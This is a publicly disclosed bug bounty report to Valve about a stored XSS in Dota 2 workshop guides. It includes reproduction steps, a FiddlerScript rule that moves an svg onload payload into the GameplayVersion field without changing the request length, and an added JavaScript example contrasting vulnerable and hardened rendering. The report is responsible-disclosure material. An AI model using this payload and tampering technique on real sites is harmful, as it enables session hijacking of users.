Stored XSS in the guide's GameplayVersion (www.dota2.com)
State Resolved (Closed)
Disclosed publicly 2019-01-07T20:03:56.643Z
Reported To Valve
Weakness Cross-site Scripting (XSS) - Stored
Bounty $750


Timeline
mvc submitted a report to Valve.
2018-07-10T02:00:39.493Z

Hi, team!

The beginning of this issue looks like my previous report #369043, but this one will be much more interesting :) So let's go!

Steps to reproduce:

1) Open the Dota 2 client and create a new simple guide with an XSS payload in the name.

2) Publish this guide on Steam.

3) Now go to the Fiddler app and look at the request from the Dota 2 client:

The XSS script is placed in the title; the title is displayed as safe HTML on the site, so for now nothing terrible happens.

4) Next I write a small piece of code in the Fiddler app:

// FiddlerScript, placed in the OnBeforeRequest handler of CustomRules.js.
// Only touch the guide upload to the cloud endpoint.
if (oSession.uriContains("/cloud/CB/")) {
    var strBody = oSession.GetRequestBodyAsString();
    // Strip the payload from the Title field...
    strBody = strBody.replace("mvc123<svg/onload=alert(document.domain)>", "mvc123");
    // ...and append the same payload to the GameplayVersion field, so the
    // body length stays exactly the same.
    strBody = strBody.replace("7.18", "7.18<svg/onload=alert(document.domain)>");
    oSession.utilSetRequestBody(strBody);
}

So I transfer the XSS script from "Title" to "GameplayVersion". I decided to go this way, since in this case the content length of the build's file does not change and it successfully passes the hash sum comparison.

5) Now we return to the Dota 2 client, click "Edit", change anything in our build and publish it again. And we see that the PUT request was successful and the XSS data in it is arranged the way we wanted:

6) Next I go to the Dota 2 Workshop Manager.

And here we see our public file ID. I found this connection with the public guide files while preparing the previous report, but I did not know how to apply it (before today).

7) Put this FileID into the link below and we get the public infected page:

http://www.dota2.com/workshop/builds/view?fileid=949580646106367888

And the result in the latest versions of Firefox and Chrome:

Sincerely, @mvc

Impact

As with any cross-site scripting vulnerability. The top line would be that the attacker might steal cookies to abuse users' sessions.

Regards,
Frans
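The mechanics behind the report, as an added example that is not part of the original submission or of Valve's code: a proxy rule that moves the payload from the escaped Title field into the GameplayVersion field without changing the body length, and the two renderers that make the difference between "nothing terrible happens" and a stored XSS. The JSON body shape, the field names other than Title and GameplayVersion, and both renderers are assumptions constructed for the illustration.

```javascript
// Added example, not code from the report. The request body format below is a
// constructed guess at what the client sends; only the two field names come
// from the report.
const PAYLOAD = "<svg/onload=alert(document.domain)>";

// Constructed sample body after step 2: the payload sits in Title,
// GameplayVersion is clean.
const ORIGINAL_BODY = JSON.stringify({
  Title: "mvc123" + PAYLOAD,
  GameplayVersion: "7.18",
  Hero: "npc_dota_hero_axe",
});

// Mirrors the Fiddler rule in the report: remove the payload from Title and
// append it to GameplayVersion. Because the same string is removed and
// re-added, the body length (and so Content-Length) does not change.
function moveXssPayload(body, payload) {
  return body
    .replace("mvc123" + payload, "mvc123")
    .replace("7.18", "7.18" + payload);
}

// A server-side check that only compares body length sees nothing.
function lengthCheckPasses(original, tampered) {
  return original.length === tampered.length;
}

// Minimal HTML encoding for text nodes and quoted attribute values.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) => ({
    "&": "&amp;",
    "<": "&lt;",
    ">": "&gt;",
    '"': "&quot;",
    "'": "&#39;",
  })[c]);
}

// Assumed vulnerable renderer: Title is encoded (which is why the first
// attempt in the report showed "safe HTML"), but GameplayVersion is
// concatenated into the page raw.
function renderVulnerable(guide) {
  return (
    `<h1>${escapeHtml(guide.Title)}</h1>` +
    `<span class="version">${guide.GameplayVersion}</span>`
  );
}

// Hardened renderer: every user-controlled field is encoded at output,
// regardless of whether the client "normally" sends anything dangerous in it.
function renderHardened(guide) {
  return (
    `<h1>${escapeHtml(guide.Title)}</h1>` +
    `<span class="version">${escapeHtml(guide.GameplayVersion)}</span>`
  );
}

// Runs the whole chain and reports what each check or renderer sees.
function demo() {
  const tampered = moveXssPayload(ORIGINAL_BODY, PAYLOAD);
  const guide = JSON.parse(tampered);
  return {
    sameLength: lengthCheckPasses(ORIGINAL_BODY, tampered),
    payloadInVersionField: guide.GameplayVersion === "7.18" + PAYLOAD,
    vulnerableOutputHasPayload: renderVulnerable(guide).includes(PAYLOAD),
    hardenedOutputHasPayload: renderHardened(guide).includes(PAYLOAD),
  };
}

console.log(demo());
```

The point the example makes is that the client is not a trust boundary: any field the client can send can carry the payload, and a length or client-computed integrity check on the upload does not say which field it landed in. The only check that holds is encoding every field at the point where it is written into HTML.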

doggos Activities::Comment
2018-07-10T20:19:36.923Z
Hi @mvc, Thanks for your submission. We are currently reviewing your report and will get back to you once we have additional information to share. Kind regards, @doggos


doggos Activities::BugTriaged
2018-07-10T20:21:37.623Z
Thank you for your submission! Your report has been validated, and it has been submitted to the appropriate remediation team for review. They will let the HackerOne triage team know the final ruling on this report, and if/when a fix will be implemented. The HackerOne triage team will follow-up after the remediation team has assessed the impact of this report. Please note that the status and severity are subject to change.


doggos Activities::ReportSeverityUpdated
2018-07-10T20:24:10.021Z


Activities::BountyAwarded
2018-07-12T00:00:03.794Z


jacobu Activities::BugResolved
2018-07-12T00:00:25.050Z
Thanks for the report! We have deployed a fix to our production systems. Please let us know if you are still able to reproduce the issue.


mvc Activities::Comment
2018-08-02T08:29:19.635Z
Hi, team! Can we full disclose this report?


mvc Activities::AgreedOnGoingPublic
2018-08-02T18:58:11.532Z


mvc Activities::Comment
2018-10-17T09:00:50.819Z
Hi, team! Is there some problem with the disclosure of this report? Third month after my request...


bgilmore Activities::AgreedOnGoingPublic
2019-01-07T20:03:56.597Z


bgilmore Activities::ReportBecamePublic
2019-01-07T20:03:56.665Z